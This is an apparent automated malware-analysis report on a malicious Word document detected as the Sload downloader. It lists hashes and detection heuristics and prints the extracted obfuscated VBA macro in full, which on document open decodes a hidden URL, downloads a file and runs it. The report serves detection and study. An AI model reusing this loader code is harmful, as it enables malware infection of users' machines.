Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f48a49ebc424e129…

MALICIOUS

Office (OLE)

103.0 KB Created: 2019-04-24 19:37:00 Authoring application: Microsoft Office Word First seen: 2022-06-20
MD5: ef76df27958e55ee2511e9cf330f62b5 SHA-1: e24c5f2c523fe179cae36404ca69c2f90c4c205c SHA-256: f48a49ebc424e1295d41e5f9ed9e690ae85c73d2a5d31cd5318c503ff254942a
360 Risk Score

Heuristics 11

  • ClamAV: Doc.Downloader.Sload-6961205-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set vbPZRbJnFhs = CreateObject(ne9Bu6LldIl(3))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vbPZRbJnFhs = CreateObject(ne9Bu6LldIl(3))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    FCFZfKhNrTrof3U = Environ(ne9Bu6LldIl(0)) + ne9Bu6LldIl(1)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5626 bytes
SHA-256: d7dfa2b4df45f43b71142557051339c59f4762726053cbd8a34c9f3685423f99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
63 of 120 identifiers look randomly generated (e.g. 'jQ6UjzGo4wjAd4fxBhe') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If 1 And VBA7 And Win64 And 1 And 1 And 1 Then
Private sH3nea3 As Integer
Private OymkIJPy2eVDXIdXu9 As Integer
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal LIvzZvNHXibkbdS As Long, _
ByVal lrSxpT1bu As String, _
ByVal nAXWfqEk9eIH7POrN As String, _
ByVal uhNH2slmQBZ As Long, _
ByVal rKh1B As Long) As LongPtr
Private POrbgTrbxK As Integer
Private AdS35RTEtWW7e As Integer
#Else
Private sH3nea3 As Integer
Private Wg5Ya As Integer
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal LIvzZvNHXibkbdS As Long, _
ByVal lrSxpT1bu As String, _
ByVal nAXWfqEk9eIH7POrN As String, _
ByVal uhNH2slmQBZ As Long, _
ByVal rKh1B As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal VpGdvwpW05ATpxfNt As String, ByVal VPJtA As Long, ByVal guuAAhrpkgvd5 As String, ByVal jQ6UjzGo4wjAd4fxBhe As String, ByVal EL9Mikl8eBKUXBswxn1 As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal fJcLbxB0XcBrZy As Long) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal GOjZ4 As Long, ByVal NjxqbdjSBz As String, ByVal l8hA92KczXOXkEVS As Long, JlVGm As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal JtPHhT0hrUz1mUU As Long, ByVal hPwvmk2fpzjK8J As String, ByVal yxuCcmokrKrbHftXj As String, ByVal S1ybLYK As Long, ByVal zNKDaIx8 As Long, ByVal rOtX5o9ifxYb4BS As Long) As Long
Private MlHGHJAidPZCFS As Integer


#End If
Sub Document_Open()
CIMcojGEeG
End Sub
Sub CIMcojGEeG()
Dim ZCGzrtTgL5W
Dim ne9Bu6LldIl
Dim FCFZfKhNrTrof3U As String
ne9Bu6LldIl = Array(ZaxZf1Hvb2i(PEwnsEgdsG4ih(TmRXNr1T3nFuE(), Mx2pUNwA9())), ZaxZf1Hvb2i("\T]<hDGLm-*=mW:0i-tZmv^n./eaeVewxajJe]J_"), ZaxZf1Hvb2i("hg`+t_`=t]aVp~f@so]]:NMc/lcG/JDZvlwxiv~Icl-toHEMm}v;c13)ljj>ev`5a-Phn01Ki=DCnOrggCeb.59aiJN?n8OVfPcXoF_X/Dt?lkqVo`dzgP3)i2V+nRlL/F\Yf\T9rtt(e9^Msrvdhi2}/PWsw4TSefxBd>-wsS|u.4~*e~gHx-v{eUN-"), ZaxZf1Hvb2i(bC3d7aI9(jd8iZSrCi(), kUgX40cz9BI())))
Dim vbPZRbJnFhs
Set vbPZRbJnFhs = CreateObject(ne9Bu6LldIl(3))
FCFZfKhNrTrof3U = Environ(ne9Bu6LldIl(0)) + ne9Bu6LldIl(1)
Call URLDownloadToFile(ZaxZf1Hvb2i(YxvbYDxW7(FOcnnk(), AkeM8fiNb())), ne9Bu6LldIl(2), FCFZfKhNrTrof3U, ZaxZf1Hvb2i(YxvbYDxW7(FOcnnk(), AkeM8fiNb())), ZaxZf1Hvb2i(YxvbYDxW7(FOcnnk(), AkeM8fiNb())))
vbPZRbJnFhs.Open (FCFZfKhNrTrof3U)
End Sub

Function ZaxZf1Hvb2i(TYIIhctT) As String
    Dim EmmYjinx3(1055) As Byte
    Dim jHD9yyE3vpU7QBj() As Byte
    Dim L3q9wO0snCXb5u85
    Dim r6QCKCQSd4kKrNzj
    jHD9yyE3vpU7QBj = StrConv(TYIIhctT, 128)
    For r6QCKCQSd4kKrNzj = 0 To UBound(jHD9yyE3vpU7QBj) - 1
        If (r6QCKCQSd4kKrNzj Mod 4 = 0) Then
            EmmYjinx3(L3q9wO0snCXb5u85) = jHD9yyE3vpU7QBj(r6QCKCQSd4kKrNzj)
            L3q9wO0snCXb5u85 = L3q9wO0snCXb5u85 + 1
        End If
    Next r6QCKCQSd4kKrNzj
    ZaxZf1Hvb2i = Left(StrConv(EmmYjinx3, 64), L3q9wO0snCXb5u85)
End Function

Function PEwnsEgdsG4ih(IJJemwGovxRI2gohfF8 As String, VbuF4n As String)
PEwnsEgdsG4ih = IJJemwGovxRI2gohfF8 + VbuF4n
End Function
Function bC3d7aI9(yEKSZaPp As String, Lyzr4qSIOKU9r As String)
bC3d7aI9 = yEKSZaPp + Lyzr4qSIOKU9r
End Function
Function YxvbYDxW7(Xgu1DWEwIO3EqnhwL As String, LN2TghpqbPfDDalv As String)
YxvbYDxW7 = Xgu1DWEwIO3EqnhwL + LN2TghpqbPfDDalv
End Function
Function qWKu2LDzk(wRYQQL3 As String, As3avcD2lM2y As String)
qWKu2LDzk = wRYQQL3 + As3avcD2lM2y
End Function
Function n8EGirdO5fXwp(CNrz5Ab7Yj5oIJtM9 As String, Wv0Jsbc6tEOMuqAbdpZ As String)
n8EGirdO5fXwp = CNrz5Ab7Yj5oIJtM9 + Wv0Jsbc6tEOMuqAbdpZ
End Function
Function TmRXNr1T3nFuE() As String
Dim b2Dgre1
Dim fjPQwQM89njc10yP
b2Dgre1 = "T,Ed"
fjPQwQM89njc10yP = b2Dgre1 & "E4+m"
TmRXNr1T3nFuE = fjPQwQM89njc10yP
End Function

Function Mx2pUNwA9() As String
Dim qOVref
Dim kDo02hSED4kSulU1H
qOVref = "M2=d"
kDo02hSED4kSulU1H = qOVref & "PJ,j"
Mx2pUNwA9 = kDo02hSED4kSulU1H
End Function

Function jd8iZSrCi() As String
Dim waW7lyic
Dim c33T8A
waW7lyic = "Skb^h2:?e4J}lV3Ul"
c33T8A = waW7lyic & "c6g.g-CA11Hpj[xpt"
jd8iZSrCi = c33T8A
End Function

Function kUgX40cz9BI() As String
Dim BP0jcM5S
Dim KVPwFVVN8M
BP0jcM5S = "NyljXkiZVXc@ymay7"
KVPwFVVN8M = BP0jcM5S & "/tMPRiST:o7Osn-I8"
kUgX40cz9BI = KVPwFVVN8M
End Function

Function FOcnnk() As String
Dim Ev38tdE5OQdOk5ujP
Dim VklPv
Ev38tdE5OQdOk5ujP = "0"
VklPv = Ev38tdE5OQdOk5ujP & "H"
FOcnnk = VklPv
End Function

Function AkeM8fiNb() As String
Dim q8CbM1S67g
Dim v7tFxuWNUWxfp
q8CbM1S67g = "@"
v7tFxuWNUWxfp = q8CbM1S67g & "y"
AkeM8fiNb = v7tFxuWNUWxfp
End Function

Function QJUCTUe() As String
Dim wkK2W60cN
Dim xJ4vwHH
wkK2W60cN = "0"
xJ4vwHH = wkK2W60cN & "H"
QJUCTUe = xJ4vwHH
End Function

Function tT88mVfI36Kv() As String
Dim DcHIwTdBflU
Dim yNGsxAI
DcHIwTdBflU = "@"
yNGsxAI = DcHIwTdBflU & "y"
tT88mVfI36Kv = yNGsxAI
End Function

Function Vjh7lH4H() As String
Dim Gq2zw
Dim C3XAaA2xE5HugMsS78N
Gq2zw = "0"
C3XAaA2xE5HugMsS78N = Gq2zw & "H"
Vjh7lH4H = C3XAaA2xE5HugMsS78N
End Function

Function BPXQDV2P() As String
Dim lb1F64LucgQFDgHCt
Dim vTaUiXjIzyGoQnj
lb1F64LucgQFDgHCt = "@"
vTaUiXjIzyGoQnj = lb1F64LucgQFDgHCt & "y"
BPXQDV2P = vTaUiXjIzyGoQnj
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.